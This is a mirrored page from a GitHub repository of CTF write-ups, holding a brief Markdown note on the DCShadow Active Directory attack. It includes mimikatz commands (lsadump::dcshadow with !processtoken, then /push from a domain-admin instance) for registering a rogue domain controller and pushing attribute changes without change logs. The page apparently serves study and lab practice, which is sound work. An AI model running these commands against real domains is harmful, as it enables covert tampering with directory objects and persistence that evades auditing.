mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 13:03:01 +00:00
21 lines
602 B
Markdown
21 lines
602 B
Markdown
# Forest Attacks - Cross Forest Attacks
|
|
DCShaodw temporarliy registers a new domain controller in the domain and uses it to push attributes like SIDHistory , SPNs and etc without leaving change logs for objects.
|
|
|
|
New domain controller is registered by modifying configuration , SPNs of existing computer object and couple of RPC services
|
|
|
|
|
|
## Mimikatz
|
|
|
|
We need two instances of mimikatz for `DCShadow`
|
|
|
|
```
|
|
!+
|
|
!processtoken
|
|
lsadump::dcshadow /objec:rootuser /attribute:Description /value="Hello from DCShadow"
|
|
```
|
|
|
|
And the second instance with domain admin privileges
|
|
|
|
```
|
|
lsadump::dcshadow /push
|
|
```
|